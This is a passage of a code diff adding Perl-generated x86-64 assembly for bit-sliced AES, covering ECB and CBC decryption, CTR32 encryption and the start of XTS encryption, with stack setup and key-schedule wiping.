+	movdqu	0x30($inp), @XMM[3]
+	movdqu	0x40($inp), @XMM[4]
+	movdqu	0x50($inp), @XMM[5]
+	mov	%rsp, %rax		# pass key schedule
+	movdqu	0x60($inp), @XMM[6]
+	mov	%ebx,%r10d		# pass rounds
+	movdqu	0x70($inp), @XMM[7]
+	lea	0x80($inp), $inp
+
+	call	_bsaes_decrypt8
+
+	movdqu	@XMM[0], 0x00($out)	# write output
+	movdqu	@XMM[1], 0x10($out)
+	movdqu	@XMM[6], 0x20($out)
+	movdqu	@XMM[4], 0x30($out)
+	movdqu	@XMM[2], 0x40($out)
+	movdqu	@XMM[7], 0x50($out)
+	movdqu	@XMM[3], 0x60($out)
+	movdqu	@XMM[5], 0x70($out)
+	lea	0x80($out), $out
+	sub	\$8,$len
+	jnc	.Lecb_dec_loop
+
+	add	\$8,$len
+	jz	.Lecb_dec_done
+
+	movdqu	0x00($inp), @XMM[0]	# load input
+	mov	%rsp, %rax		# pass key schedule
+	mov	%ebx,%r10d		# pass rounds
+	cmp	\$2,$len
+	jb	.Lecb_dec_one
+	movdqu	0x10($inp), @XMM[1]
+	je	.Lecb_dec_two
+	movdqu	0x20($inp), @XMM[2]
+	cmp	\$4,$len
+	jb	.Lecb_dec_three
+	movdqu	0x30($inp), @XMM[3]
+	je	.Lecb_dec_four
+	movdqu	0x40($inp), @XMM[4]
+	cmp	\$6,$len
+	jb	.Lecb_dec_five
+	movdqu	0x50($inp), @XMM[5]
+	je	.Lecb_dec_six
+	movdqu	0x60($inp), @XMM[6]
+	call	_bsaes_decrypt8
+	movdqu	@XMM[0], 0x00($out)	# write output
+	movdqu	@XMM[1], 0x10($out)
+	movdqu	@XMM[6], 0x20($out)
+	movdqu	@XMM[4], 0x30($out)
+	movdqu	@XMM[2], 0x40($out)
+	movdqu	@XMM[7], 0x50($out)
+	movdqu	@XMM[3], 0x60($out)
+	jmp	.Lecb_dec_done
+.align	16
+.Lecb_dec_six:
+	call	_bsaes_decrypt8
+	movdqu	@XMM[0], 0x00($out)	# write output
+	movdqu	@XMM[1], 0x10($out)
+	movdqu	@XMM[6], 0x20($out)
+	movdqu	@XMM[4], 0x30($out)
+	movdqu	@XMM[2], 0x40($out)
+	movdqu	@XMM[7], 0x50($out)
+	jmp	.Lecb_dec_done
+.align	16
+.Lecb_dec_five:
+	call	_bsaes_decrypt8
+	movdqu	@XMM[0], 0x00($out)	# write output
+	movdqu	@XMM[1], 0x10($out)
+	movdqu	@XMM[6], 0x20($out)
+	movdqu	@XMM[4], 0x30($out)
+	movdqu	@XMM[2], 0x40($out)
+	jmp	.Lecb_dec_done
+.align	16
+.Lecb_dec_four:
+	call	_bsaes_decrypt8
+	movdqu	@XMM[0], 0x00($out)	# write output
+	movdqu	@XMM[1], 0x10($out)
+	movdqu	@XMM[6], 0x20($out)
+	movdqu	@XMM[4], 0x30($out)
+	jmp	.Lecb_dec_done
+.align	16
+.Lecb_dec_three:
+	call	_bsaes_decrypt8
+	movdqu	@XMM[0], 0x00($out)	# write output
+	movdqu	@XMM[1], 0x10($out)
+	movdqu	@XMM[6], 0x20($out)
+	jmp	.Lecb_dec_done
+.align	16
+.Lecb_dec_two:
+	call	_bsaes_decrypt8
+	movdqu	@XMM[0], 0x00($out)	# write output
+	movdqu	@XMM[1], 0x10($out)
+	jmp	.Lecb_dec_done
+.align	16
+.Lecb_dec_one:
+	call	_bsaes_decrypt8
+	movdqu	@XMM[0], 0x00($out)	# write output
+	jmp	.Lecb_dec_done
+.align	16
+.Lecb_dec_short:
+	lea	($inp), $arg1
+	lea	($out), $arg2
+	lea	($key), $arg3
+	call	asm_AES_decrypt
+	lea	16($inp), $inp
+	lea	16($out), $out
+	dec	$len
+	jnz	.Lecb_dec_short
+
+.Lecb_dec_done:
+	lea	(%rsp),%rax
+	pxor	%xmm0, %xmm0
+.Lecb_dec_bzero:			# wipe key schedule [if any]
+	movdqa	%xmm0, 0x00(%rax)
+	movdqa	%xmm0, 0x10(%rax)
+	lea	0x20(%rax), %rax
+	cmp	%rax, %rbp
+	jb	.Lecb_dec_bzero
+
+	lea	(%rbp),%rsp		# restore %rsp
+___
+$code.=<<___ if ($win64);
+	movaps	0x40(%rbp), %xmm6
+	movaps	0x50(%rbp), %xmm7
+	movaps	0x60(%rbp), %xmm8
+	movaps	0x70(%rbp), %xmm9
+	movaps	0x80(%rbp), %xmm10
+	movaps	0x90(%rbp), %xmm11
+	movaps	0xa0(%rbp), %xmm12
+	movaps	0xb0(%rbp), %xmm13
+	movaps	0xc0(%rbp), %xmm14
+	movaps	0xd0(%rbp), %xmm15
+	lea	0xa0(%rbp), %rsp
+___
+$code.=<<___;
+	mov	0x48(%rsp), %r15
+	mov	0x50(%rsp), %r14
+	mov	0x58(%rsp), %r13
+	mov	0x60(%rsp), %r12
+	mov	0x68(%rsp), %rbx
+	mov	0x70(%rsp), %rax
+	lea	0x78(%rsp), %rsp
+	mov	%rax, %rbp
+.Lecb_dec_epilogue:
+	ret
+.size	bsaes_ecb_decrypt_blocks,.-bsaes_ecb_decrypt_blocks
+___
+}
+$code.=<<___;
+.extern	asm_AES_cbc_encrypt
+.globl	bsaes_cbc_encrypt
+.type	bsaes_cbc_encrypt,\@abi-omnipotent
+.align	16
+bsaes_cbc_encrypt:
+___
+$code.=<<___ if ($win64);
+	mov	48(%rsp),$arg6		# pull direction flag
+___
+$code.=<<___;
+	cmp	\$0,$arg6
+	jne	asm_AES_cbc_encrypt
+	cmp	\$128,$arg3
+	jb	asm_AES_cbc_encrypt
+
+	mov	%rsp, %rax
+.Lcbc_dec_prologue:
+	push	%rbp
+	push	%rbx
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	lea	-0x48(%rsp), %rsp
+___
+$code.=<<___ if ($win64);
+	mov	0xa0(%rsp),$arg5	# pull ivp
+	lea	-0xa0(%rsp), %rsp
+	movaps	%xmm6, 0x40(%rsp)
+	movaps	%xmm7, 0x50(%rsp)
+	movaps	%xmm8, 0x60(%rsp)
+	movaps	%xmm9, 0x70(%rsp)
+	movaps	%xmm10, 0x80(%rsp)
+	movaps	%xmm11, 0x90(%rsp)
+	movaps	%xmm12, 0xa0(%rsp)
+	movaps	%xmm13, 0xb0(%rsp)
+	movaps	%xmm14, 0xc0(%rsp)
+	movaps	%xmm15, 0xd0(%rsp)
+.Lcbc_dec_body:
+___
+$code.=<<___;
+	mov	%rsp, %rbp		# backup %rsp
+	mov	240($arg4), %eax	# rounds
+	mov	$arg1, $inp		# backup arguments
+	mov	$arg2, $out
+	mov	$arg3, $len
+	mov	$arg4, $key
+	mov	$arg5, %rbx
+	shr	\$4, $len		# bytes to blocks
+
+	mov	%eax, %edx		# rounds
+	shl	\$7, %rax		# 128 bytes per inner round key
+	sub	\$`128-32`, %rax	# size of bit-sliced key schedule
+	sub	%rax, %rsp
+
+	mov	%rsp, %rax		# pass key schedule
+	mov	$key, %rcx		# pass key
+	mov	%edx, %r10d		# pass rounds
+	call	_bsaes_key_convert
+	pxor	(%rsp),%xmm7		# fix up 0 round key
+	movdqa	%xmm6,(%rax)		# save last round key
+	movdqa	%xmm7,(%rsp)
+
+	movdqu	(%rbx), @XMM[15]	# load IV
+	sub	\$8,$len
+.Lcbc_dec_loop:
+	movdqu	0x00($inp), @XMM[0]	# load input
+	movdqu	0x10($inp), @XMM[1]
+	movdqu	0x20($inp), @XMM[2]
+	movdqu	0x30($inp), @XMM[3]
+	movdqu	0x40($inp), @XMM[4]
+	movdqu	0x50($inp), @XMM[5]
+	mov	%rsp, %rax		# pass key schedule
+	movdqu	0x60($inp), @XMM[6]
+	mov	%edx,%r10d		# pass rounds
+	movdqu	0x70($inp), @XMM[7]
+	movdqa	@XMM[15], 0x20(%rbp)	# put aside IV
+
+	call	_bsaes_decrypt8
+
+	pxor	0x20(%rbp), @XMM[0]	# ^= IV
+	movdqu	0x00($inp), @XMM[8]	# re-load input
+	movdqu	0x10($inp), @XMM[9]
+	pxor	@XMM[8], @XMM[1]
+	movdqu	0x20($inp), @XMM[10]
+	pxor	@XMM[9], @XMM[6]
+	movdqu	0x30($inp), @XMM[11]
+	pxor	@XMM[10], @XMM[4]
+	movdqu	0x40($inp), @XMM[12]
+	pxor	@XMM[11], @XMM[2]
+	movdqu	0x50($inp), @XMM[13]
+	pxor	@XMM[12], @XMM[7]
+	movdqu	0x60($inp), @XMM[14]
+	pxor	@XMM[13], @XMM[3]
+	movdqu	0x70($inp), @XMM[15]	# IV
+	pxor	@XMM[14], @XMM[5]
+	movdqu	@XMM[0], 0x00($out)	# write output
+	lea	0x80($inp), $inp
+	movdqu	@XMM[1], 0x10($out)
+	movdqu	@XMM[6], 0x20($out)
+	movdqu	@XMM[4], 0x30($out)
+	movdqu	@XMM[2], 0x40($out)
+	movdqu	@XMM[7], 0x50($out)
+	movdqu	@XMM[3], 0x60($out)
+	movdqu	@XMM[5], 0x70($out)
+	lea	0x80($out), $out
+	sub	\$8,$len
+	jnc	.Lcbc_dec_loop
+
+	add	\$8,$len
+	jz	.Lcbc_dec_done
+
+	movdqu	0x00($inp), @XMM[0]	# load input
+	mov	%rsp, %rax		# pass key schedule
+	mov	%edx, %r10d		# pass rounds
+	cmp	\$2,$len
+	jb	.Lcbc_dec_one
+	movdqu	0x10($inp), @XMM[1]
+	je	.Lcbc_dec_two
+	movdqu	0x20($inp), @XMM[2]
+	cmp	\$4,$len
+	jb	.Lcbc_dec_three
+	movdqu	0x30($inp), @XMM[3]
+	je	.Lcbc_dec_four
+	movdqu	0x40($inp), @XMM[4]
+	cmp	\$6,$len
+	jb	.Lcbc_dec_five
+	movdqu	0x50($inp), @XMM[5]
+	je	.Lcbc_dec_six
+	movdqu	0x60($inp), @XMM[6]
+	movdqa	@XMM[15], 0x20(%rbp)	# put aside IV
+	call	_bsaes_decrypt8
+	pxor	0x20(%rbp), @XMM[0]	# ^= IV
+	movdqu	0x00($inp), @XMM[8]	# re-load input
+	movdqu	0x10($inp), @XMM[9]
+	pxor	@XMM[8], @XMM[1]
+	movdqu	0x20($inp), @XMM[10]
+	pxor	@XMM[9], @XMM[6]
+	movdqu	0x30($inp), @XMM[11]
+	pxor	@XMM[10], @XMM[4]
+	movdqu	0x40($inp), @XMM[12]
+	pxor	@XMM[11], @XMM[2]
+	movdqu	0x50($inp), @XMM[13]
+	pxor	@XMM[12], @XMM[7]
+	movdqu	0x60($inp), @XMM[15]	# IV
+	pxor	@XMM[13], @XMM[3]
+	movdqu	@XMM[0], 0x00($out)	# write output
+	movdqu	@XMM[1], 0x10($out)
+	movdqu	@XMM[6], 0x20($out)
+	movdqu	@XMM[4], 0x30($out)
+	movdqu	@XMM[2], 0x40($out)
+	movdqu	@XMM[7], 0x50($out)
+	movdqu	@XMM[3], 0x60($out)
+	jmp	.Lcbc_dec_done
+.align	16
+.Lcbc_dec_six:
+	movdqa	@XMM[15], 0x20(%rbp)	# put aside IV
+	call	_bsaes_decrypt8
+	pxor	0x20(%rbp), @XMM[0]	# ^= IV
+	movdqu	0x00($inp), @XMM[8]	# re-load input
+	movdqu	0x10($inp), @XMM[9]
+	pxor	@XMM[8], @XMM[1]
+	movdqu	0x20($inp), @XMM[10]
+	pxor	@XMM[9], @XMM[6]
+	movdqu	0x30($inp), @XMM[11]
+	pxor	@XMM[10], @XMM[4]
+	movdqu	0x40($inp), @XMM[12]
+	pxor	@XMM[11], @XMM[2]
+	movdqu	0x50($inp), @XMM[15]	# IV
+	pxor	@XMM[12], @XMM[7]
+	movdqu	@XMM[0], 0x00($out)	# write output
+	movdqu	@XMM[1], 0x10($out)
+	movdqu	@XMM[6], 0x20($out)
+	movdqu	@XMM[4], 0x30($out)
+	movdqu	@XMM[2], 0x40($out)
+	movdqu	@XMM[7], 0x50($out)
+	jmp	.Lcbc_dec_done
+.align	16
+.Lcbc_dec_five:
+	movdqa	@XMM[15], 0x20(%rbp)	# put aside IV
+	call	_bsaes_decrypt8
+	pxor	0x20(%rbp), @XMM[0]	# ^= IV
+	movdqu	0x00($inp), @XMM[8]	# re-load input
+	movdqu	0x10($inp), @XMM[9]
+	pxor	@XMM[8], @XMM[1]
+	movdqu	0x20($inp), @XMM[10]
+	pxor	@XMM[9], @XMM[6]
+	movdqu	0x30($inp), @XMM[11]
+	pxor	@XMM[10], @XMM[4]
+	movdqu	0x40($inp), @XMM[15]	# IV
+	pxor	@XMM[11], @XMM[2]
+	movdqu	@XMM[0], 0x00($out)	# write output
+	movdqu	@XMM[1], 0x10($out)
+	movdqu	@XMM[6], 0x20($out)
+	movdqu	@XMM[4], 0x30($out)
+	movdqu	@XMM[2], 0x40($out)
+	jmp	.Lcbc_dec_done
+.align	16
+.Lcbc_dec_four:
+	movdqa	@XMM[15], 0x20(%rbp)	# put aside IV
+	call	_bsaes_decrypt8
+	pxor	0x20(%rbp), @XMM[0]	# ^= IV
+	movdqu	0x00($inp), @XMM[8]	# re-load input
+	movdqu	0x10($inp), @XMM[9]
+	pxor	@XMM[8], @XMM[1]
+	movdqu	0x20($inp), @XMM[10]
+	pxor	@XMM[9], @XMM[6]
+	movdqu	0x30($inp), @XMM[15]	# IV
+	pxor	@XMM[10], @XMM[4]
+	movdqu	@XMM[0], 0x00($out)	# write output
+	movdqu	@XMM[1], 0x10($out)
+	movdqu	@XMM[6], 0x20($out)
+	movdqu	@XMM[4], 0x30($out)
+	jmp	.Lcbc_dec_done
+.align	16
+.Lcbc_dec_three:
+	movdqa	@XMM[15], 0x20(%rbp)	# put aside IV
+	call	_bsaes_decrypt8
+	pxor	0x20(%rbp), @XMM[0]	# ^= IV
+	movdqu	0x00($inp), @XMM[8]	# re-load input
+	movdqu	0x10($inp), @XMM[9]
+	pxor	@XMM[8], @XMM[1]
+	movdqu	0x20($inp), @XMM[15]	# IV
+	pxor	@XMM[9], @XMM[6]
+	movdqu	@XMM[0], 0x00($out)	# write output
+	movdqu	@XMM[1], 0x10($out)
+	movdqu	@XMM[6], 0x20($out)
+	jmp	.Lcbc_dec_done
+.align	16
+.Lcbc_dec_two:
+	movdqa	@XMM[15], 0x20(%rbp)	# put aside IV
+	call	_bsaes_decrypt8
+	pxor	0x20(%rbp), @XMM[0]	# ^= IV
+	movdqu	0x00($inp), @XMM[8]	# re-load input
+	movdqu	0x10($inp), @XMM[15]	# IV
+	pxor	@XMM[8], @XMM[1]
+	movdqu	@XMM[0], 0x00($out)	# write output
+	movdqu	@XMM[1], 0x10($out)
+	jmp	.Lcbc_dec_done
+.align	16
+.Lcbc_dec_one:
+	lea	($inp), $arg1
+	lea	0x20(%rbp), $arg2	# buffer output
+	lea	($key), $arg3
+	call	asm_AES_decrypt		# doesn't touch %xmm
+	pxor	0x20(%rbp), @XMM[15]	# ^= IV
+	movdqu	@XMM[15], ($out)	# write output
+	movdqa	@XMM[0], @XMM[15]	# IV
+
+.Lcbc_dec_done:
+	movdqu	@XMM[15], (%rbx)	# return IV
+	lea	(%rsp), %rax
+	pxor	%xmm0, %xmm0
+.Lcbc_dec_bzero:			# wipe key schedule [if any]
+	movdqa	%xmm0, 0x00(%rax)
+	movdqa	%xmm0, 0x10(%rax)
+	lea	0x20(%rax), %rax
+	cmp	%rax, %rbp
+	ja	.Lcbc_dec_bzero
+
+	lea	(%rbp),%rsp		# restore %rsp
+___
+$code.=<<___ if ($win64);
+	movaps	0x40(%rbp), %xmm6
+	movaps	0x50(%rbp), %xmm7
+	movaps	0x60(%rbp), %xmm8
+	movaps	0x70(%rbp), %xmm9
+	movaps	0x80(%rbp), %xmm10
+	movaps	0x90(%rbp), %xmm11
+	movaps	0xa0(%rbp), %xmm12
+	movaps	0xb0(%rbp), %xmm13
+	movaps	0xc0(%rbp), %xmm14
+	movaps	0xd0(%rbp), %xmm15
+	lea	0xa0(%rbp), %rsp
+___
+$code.=<<___;
+	mov	0x48(%rsp), %r15
+	mov	0x50(%rsp), %r14
+	mov	0x58(%rsp), %r13
+	mov	0x60(%rsp), %r12
+	mov	0x68(%rsp), %rbx
+	mov	0x70(%rsp), %rax
+	lea	0x78(%rsp), %rsp
+	mov	%rax, %rbp
+.Lcbc_dec_epilogue:
+	ret
+.size	bsaes_cbc_encrypt,.-bsaes_cbc_encrypt
+
+.globl	bsaes_ctr32_encrypt_blocks
+.type	bsaes_ctr32_encrypt_blocks,\@abi-omnipotent
+.align	16
+bsaes_ctr32_encrypt_blocks:
+	mov	%rsp, %rax
+.Lctr_enc_prologue:
+	push	%rbp
+	push	%rbx
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	lea	-0x48(%rsp), %rsp
+___
+$code.=<<___ if ($win64);
+	mov	0xa0(%rsp),$arg5	# pull ivp
+	lea	-0xa0(%rsp), %rsp
+	movaps	%xmm6, 0x40(%rsp)
+	movaps	%xmm7, 0x50(%rsp)
+	movaps	%xmm8, 0x60(%rsp)
+	movaps	%xmm9, 0x70(%rsp)
+	movaps	%xmm10, 0x80(%rsp)
+	movaps	%xmm11, 0x90(%rsp)
+	movaps	%xmm12, 0xa0(%rsp)
+	movaps	%xmm13, 0xb0(%rsp)
+	movaps	%xmm14, 0xc0(%rsp)
+	movaps	%xmm15, 0xd0(%rsp)
+.Lctr_enc_body:
+___
+$code.=<<___;
+	mov	%rsp, %rbp		# backup %rsp
+	movdqu	($arg5), %xmm0		# load counter
+	mov	240($arg4), %eax	# rounds
+	mov	$arg1, $inp		# backup arguments
+	mov	$arg2, $out
+	mov	$arg3, $len
+	mov	$arg4, $key
+	movdqa	%xmm0, 0x20(%rbp)	# copy counter
+	cmp	\$8, $arg3
+	jb	.Lctr_enc_short
+
+	mov	%eax, %ebx		# rounds
+	shl	\$7, %rax		# 128 bytes per inner round key
+	sub	\$`128-32`, %rax	# size of bit-sliced key schedule
+	sub	%rax, %rsp
+
+	mov	%rsp, %rax		# pass key schedule
+	mov	$key, %rcx		# pass key
+	mov	%ebx, %r10d		# pass rounds
+	call	_bsaes_key_convert
+	pxor	%xmm6,%xmm7		# fix up last round key
+	movdqa	%xmm7,(%rax)		# save last round key
+
+	movdqa	(%rsp), @XMM[9]		# load round0 key
+	lea	.LADD1(%rip), %r11
+	movdqa	0x20(%rbp), @XMM[0]	# counter copy
+	movdqa	-0x20(%r11), @XMM[8]	# .LSWPUP
+	pshufb	@XMM[8], @XMM[9]	# byte swap upper part
+	pshufb	@XMM[8], @XMM[0]
+	movdqa	@XMM[9], (%rsp)		# save adjusted round0 key
+	jmp	.Lctr_enc_loop
+.align	16
+.Lctr_enc_loop:
+	movdqa	@XMM[0], 0x20(%rbp)	# save counter
+	movdqa	@XMM[0], @XMM[1]	# prepare 8 counter values
+	movdqa	@XMM[0], @XMM[2]
+	paddd	0x00(%r11), @XMM[1]	# .LADD1
+	movdqa	@XMM[0], @XMM[3]
+	paddd	0x10(%r11), @XMM[2]	# .LADD2
+	movdqa	@XMM[0], @XMM[4]
+	paddd	0x20(%r11), @XMM[3]	# .LADD3
+	movdqa	@XMM[0], @XMM[5]
+	paddd	0x30(%r11), @XMM[4]	# .LADD4
+	movdqa	@XMM[0], @XMM[6]
+	paddd	0x40(%r11), @XMM[5]	# .LADD5
+	movdqa	@XMM[0], @XMM[7]
+	paddd	0x50(%r11), @XMM[6]	# .LADD6
+	paddd	0x60(%r11), @XMM[7]	# .LADD7
+
+	# Borrow prologue from _bsaes_encrypt8 to use the opportunity
+	# to flip byte order in 32-bit counter
+	movdqa	(%rsp), @XMM[9]		# round 0 key
+	lea	0x10(%rsp), %rax	# pass key schedule
+	movdqa	-0x10(%r11), @XMM[8]	# .LSWPUPM0SR
+	pxor	@XMM[9], @XMM[0]	# xor with round0 key
+	pxor	@XMM[9], @XMM[1]
+	pxor	@XMM[9], @XMM[2]
+	pxor	@XMM[9], @XMM[3]
+	 pshufb	@XMM[8], @XMM[0]
+	 pshufb	@XMM[8], @XMM[1]
+	pxor	@XMM[9], @XMM[4]
+	pxor	@XMM[9], @XMM[5]
+	 pshufb	@XMM[8], @XMM[2]
+	 pshufb	@XMM[8], @XMM[3]
+	pxor	@XMM[9], @XMM[6]
+	pxor	@XMM[9], @XMM[7]
+	 pshufb	@XMM[8], @XMM[4]
+	 pshufb	@XMM[8], @XMM[5]
+	 pshufb	@XMM[8], @XMM[6]
+	 pshufb	@XMM[8], @XMM[7]
+	lea	.LBS0(%rip), %r11	# constants table
+	mov	%ebx,%r10d		# pass rounds
+
+	call	_bsaes_encrypt8_bitslice
+
+	sub	\$8,$len
+	jc	.Lctr_enc_loop_done
+
+	movdqu	0x00($inp), @XMM[8]	# load input
+	movdqu	0x10($inp), @XMM[9]
+	movdqu	0x20($inp), @XMM[10]
+	movdqu	0x30($inp), @XMM[11]
+	movdqu	0x40($inp), @XMM[12]
+	movdqu	0x50($inp), @XMM[13]
+	movdqu	0x60($inp), @XMM[14]
+	movdqu	0x70($inp), @XMM[15]
+	lea	0x80($inp),$inp
+	pxor	@XMM[0], @XMM[8]
+	movdqa	0x20(%rbp), @XMM[0]	# load counter
+	pxor	@XMM[9], @XMM[1]
+	movdqu	@XMM[8], 0x00($out)	# write output
+	pxor	@XMM[10], @XMM[4]
+	movdqu	@XMM[1], 0x10($out)
+	pxor	@XMM[11], @XMM[6]
+	movdqu	@XMM[4], 0x20($out)
+	pxor	@XMM[12], @XMM[3]
+	movdqu	@XMM[6], 0x30($out)
+	pxor	@XMM[13], @XMM[7]
+	movdqu	@XMM[3], 0x40($out)
+	pxor	@XMM[14], @XMM[2]
+	movdqu	@XMM[7], 0x50($out)
+	pxor	@XMM[15], @XMM[5]
+	movdqu	@XMM[2], 0x60($out)
+	lea	.LADD1(%rip), %r11
+	movdqu	@XMM[5], 0x70($out)
+	lea	0x80($out), $out
+	paddd	0x70(%r11), @XMM[0]	# .LADD8
+	jnz	.Lctr_enc_loop
+
+	jmp	.Lctr_enc_done
+.align	16
+.Lctr_enc_loop_done:
+	add	\$8, $len
+	movdqu	0x00($inp), @XMM[8]	# load input
+	pxor	@XMM[8], @XMM[0]
+	movdqu	@XMM[0], 0x00($out)	# write output
+	cmp	\$2,$len
+	jb	.Lctr_enc_done
+	movdqu	0x10($inp), @XMM[9]
+	pxor	@XMM[9], @XMM[1]
+	movdqu	@XMM[1], 0x10($out)
+	je	.Lctr_enc_done
+	movdqu	0x20($inp), @XMM[10]
+	pxor	@XMM[10], @XMM[4]
+	movdqu	@XMM[4], 0x20($out)
+	cmp	\$4,$len
+	jb	.Lctr_enc_done
+	movdqu	0x30($inp), @XMM[11]
+	pxor	@XMM[11], @XMM[6]
+	movdqu	@XMM[6], 0x30($out)
+	je	.Lctr_enc_done
+	movdqu	0x40($inp), @XMM[12]
+	pxor	@XMM[12], @XMM[3]
+	movdqu	@XMM[3], 0x40($out)
+	cmp	\$6,$len
+	jb	.Lctr_enc_done
+	movdqu	0x50($inp), @XMM[13]
+	pxor	@XMM[13], @XMM[7]
+	movdqu	@XMM[7], 0x50($out)
+	je	.Lctr_enc_done
+	movdqu	0x60($inp), @XMM[14]
+	pxor	@XMM[14], @XMM[2]
+	movdqu	@XMM[2], 0x60($out)
+	jmp	.Lctr_enc_done
+
+.align	16
+.Lctr_enc_short:
+	lea	0x20(%rbp), $arg1
+	lea	0x30(%rbp), $arg2
+	lea	($key), $arg3
+	call	asm_AES_encrypt
+	movdqu	($inp), @XMM[1]
+	lea	16($inp), $inp
+	mov	0x2c(%rbp), %eax	# load 32-bit counter
+	bswap	%eax
+	pxor	0x30(%rbp), @XMM[1]
+	inc	%eax			# increment
+	movdqu	@XMM[1], ($out)
+	bswap	%eax
+	lea	16($out), $out
+	mov	%eax, 0x2c(%rsp)	# save 32-bit counter
+	dec	$len
+	jnz	.Lctr_enc_short
+
+.Lctr_enc_done:
+	lea	(%rsp), %rax
+	pxor	%xmm0, %xmm0
+.Lctr_enc_bzero:			# wipe key schedule [if any]
+	movdqa	%xmm0, 0x00(%rax)
+	movdqa	%xmm0, 0x10(%rax)
+	lea	0x20(%rax), %rax
+	cmp	%rax, %rbp
+	ja	.Lctr_enc_bzero
+
+	lea	(%rbp),%rsp		# restore %rsp
+___
+$code.=<<___ if ($win64);
+	movaps	0x40(%rbp), %xmm6
+	movaps	0x50(%rbp), %xmm7
+	movaps	0x60(%rbp), %xmm8
+	movaps	0x70(%rbp), %xmm9
+	movaps	0x80(%rbp), %xmm10
+	movaps	0x90(%rbp), %xmm11
+	movaps	0xa0(%rbp), %xmm12
+	movaps	0xb0(%rbp), %xmm13
+	movaps	0xc0(%rbp), %xmm14
+	movaps	0xd0(%rbp), %xmm15
+	lea	0xa0(%rbp), %rsp
+___
+$code.=<<___;
+	mov	0x48(%rsp), %r15
+	mov	0x50(%rsp), %r14
+	mov	0x58(%rsp), %r13
+	mov	0x60(%rsp), %r12
+	mov	0x68(%rsp), %rbx
+	mov	0x70(%rsp), %rax
+	lea	0x78(%rsp), %rsp
+	mov	%rax, %rbp
+.Lctr_enc_epilogue:
+	ret
+.size	bsaes_ctr32_encrypt_blocks,.-bsaes_ctr32_encrypt_blocks
+___
+######################################################################
+# void bsaes_xts_[en|de]crypt(const char *inp,char *out,size_t len,
+#	const AES_KEY *key1, const AES_KEY *key2,
+#	const unsigned char iv[16]);
+#
+my ($twmask,$twres,$twtmp)=@XMM[13..15];
+$arg6=~s/d$//;
+
+$code.=<<___;
+.globl	bsaes_xts_encrypt
+.type	bsaes_xts_encrypt,\@abi-omnipotent
+.align	16
+bsaes_xts_encrypt:
+	mov	%rsp, %rax
+.Lxts_enc_prologue:
+	push	%rbp
+	push	%rbx
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	lea	-0x48(%rsp), %rsp
+___
+$code.=<<___ if ($win64);
+	mov	0xa0(%rsp),$arg5	# pull key2
+	mov	0xa8(%rsp),$arg6	# pull ivp
+	lea	-0xa0(%rsp), %rsp
+	movaps	%xmm6, 0x40(%rsp)
+	movaps	%xmm7, 0x50(%rsp)
+	movaps	%xmm8, 0x60(%rsp)
+	movaps	%xmm9, 0x70(%rsp)
+	movaps	%xmm10, 0x80(%rsp)
+	movaps	%xmm11, 0x90(%rsp)
+	movaps	%xmm12, 0xa0(%rsp)
+	movaps	%xmm13, 0xb0(%rsp)
+	movaps	%xmm14, 0xc0(%rsp)
+	movaps	%xmm15, 0xd0(%rsp)
+.Lxts_enc_body:
+___
+$code.=<<___;
+	mov	%rsp, %rbp		# backup %rsp
+	mov	$arg1, $inp		# backup arguments
+	mov	$arg2, $out
+	mov	$arg3, $len
+	mov	$arg4, $key
+
+	lea	($arg6), $arg1
+	lea	0x20(%rbp), $arg2
+	lea	($arg5), $arg3
+	call	asm_AES_encrypt		# generate initial tweak
+
+	mov	240($key), %eax		# rounds
+	mov	$len, %rbx		# backup $len
+
+	mov	%eax, %edx		# rounds
+	shl	\$7, %rax		# 128 bytes per inner round key
+	sub	\$`128-32`, %rax	# size of bit-sliced key schedule
+	sub	%rax, %rsp
+
+	mov	%rsp, %rax		# pass key schedule
+	mov	$key, %rcx		# pass key
+	mov	%edx, %r10d		# pass rounds
+	call	_bsaes_key_convert
+	pxor	%xmm6, %xmm7		# fix up last round key
+	movdqa	%xmm7, (%rax)		# save last round key
+
+	and	\$-16, $len
+	sub	\$0x80, %rsp		# place for tweak[8]
+	movdqa	0x20(%rbp), @XMM[7]	# initial tweak
+
+	pxor	$twtmp, $twtmp
+	movdqa	.Lxts_magic(%rip), $twmask
+	pcmpgtd	@XMM[7], $twtmp		# broadcast upper bits
+
+	sub	\$0x80, $len
+	jc	.Lxts_enc_short
+	jmp	.Lxts_enc_loop
+
+.align	16
+.Lxts_enc_loop:
+___
+    for ($i=0;$i<7;$i++) {
+    $code.=<<___;
+	pshufd	\$0x13, $twtmp, $twres
+	pxor	$twtmp, $twtmp
+	movdqa	@XMM[7], @XMM[$i]
+	movdqa	@XMM[7], `0x10*$i`(%rsp)# save tweak[$i]
+	paddq	@XMM[7], @XMM[7]	# psllq	1,$tweak
+	pand	$twmask, $twres		# isolate carry and residue
+	pcmpgtd	@XMM[7], $twtmp		# broadcast upper bits
+	pxor	$twres, @XMM[7]
+___
+    $code.=<<___ if ($i>=1);
+	movdqu	`0x10*($i-1)`($inp), @XMM[8+$i-1]
+___
+    $code.=<<___ if ($i>=2);
+	pxor	@XMM[8+$i-2], @XMM[$i-2]# input[] ^ tweak[]
+___
+    }
+$code.=<<___;
+	movdqu	0x60($inp), @XMM[8+6]
+	pxor	@XMM[8+5], @XMM[5]
+	movdqu	0x70($inp), @XMM[8+7]
+	lea	0x80($inp), $inp
+	movdqa	@XMM[7], 0x70(%rsp)
+	pxor	@XMM[8+6], @XMM[6]
+	lea	0x80(%rsp), %rax	# pass key schedule
+	pxor	@XMM[8+7], @XMM[7]
+	mov	%edx, %r10d		# pass rounds
+
+	call	_bsaes_encrypt8
+
+	pxor	0x00(%rsp), @XMM[0]	# ^= tweak[]
+	pxor	0x10(%rsp), @XMM[1]
+	movdqu	@XMM[0], 0x00($out)	# write output
+	pxor	0x20(%rsp), @XMM[4]
+	movdqu	@XMM[1], 0x10($out)
+	pxor	0x30(%rsp), @XMM[6]
+	movdqu	@XMM[4], 0x20($out)
+	pxor	0x40(%rsp), @XMM[3]
+	movdqu	@XMM[6], 0x30($out)
+	pxor	0x50(%rsp), @XMM[7]
+	movdqu	@XMM[3], 0x40($out)
+	pxor	0x60(%rsp), @XMM[2]
+	movdqu	@XMM[7], 0x50($out)
+	pxor	0x70(%rsp), @XMM[5]
+	movdqu	@XMM[2], 0x60($out)
+	movdqu	@XMM[5], 0x70($out)
+	lea	0x80($out), $out
+
+	movdqa	0x70(%rsp), @XMM[7]	# prepare next iteration tweak
+	pxor	$twtmp, $twtmp
+	movdqa	.Lxts_magic(%rip), $twmask
